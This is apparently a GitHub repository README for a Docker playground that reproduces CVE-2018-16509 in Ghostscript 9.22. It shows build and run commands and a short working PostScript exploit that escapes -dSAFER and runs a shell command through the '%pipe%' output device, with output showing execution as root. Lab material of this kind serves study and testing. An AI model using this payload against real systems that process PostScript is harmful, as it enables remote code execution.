CVE-2018-16509 Docker Playground

"An issue was discovered in Artifex Ghostscript before 9.24. Incorrect "restoration of privilege" checking during handling of /invalidaccess exceptions could be used by attackers able to supply crafted PostScript to execute code using the "pipe" instruction." https://nvd.nist.gov/vuln/detail/CVE-2018-16509 https://access.redhat.com/security/cve/cve-2018-16509

Build

docker build -t cve-2018-16509:latest .

Run + Exec

docker exec -it `docker run -d cve-2018-16509:latest` bash

Version

[root@400498314b62 ~]# gs -v
GPL Ghostscript 9.22 (2017-10-04)
Copyright (C) 2017 Artifex Software, Inc.  All rights reserved.

Exploit

gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null
GS>legal
GS>{ null restore } stopped { pop } if
GS>legal
GS>mark /OutputFile (%pipe%id) currentdevice putdeviceprops
GS<1>showpage
uid=0(root) gid=0(root) groups=0(root)
[root@400498314b62 ~]#

Name		Name	Last commit message	Last commit date
Latest commit History 8 Commits
.github/workflows		.github/workflows
ghostscript-9.22		ghostscript-9.22
Dockerfile		Dockerfile
README.md		README.md
ghostscript-9.22.tar		ghostscript-9.22.tar

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2018-16509 Docker Playground

Build

Run + Exec

Version

Exploit

About

Releases

Packages

Languages

rhpco/CVE-2018-16509

Folders and files

Latest commit

History

Repository files navigation

CVE-2018-16509 Docker Playground

Build

Run + Exec

Version

Exploit

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages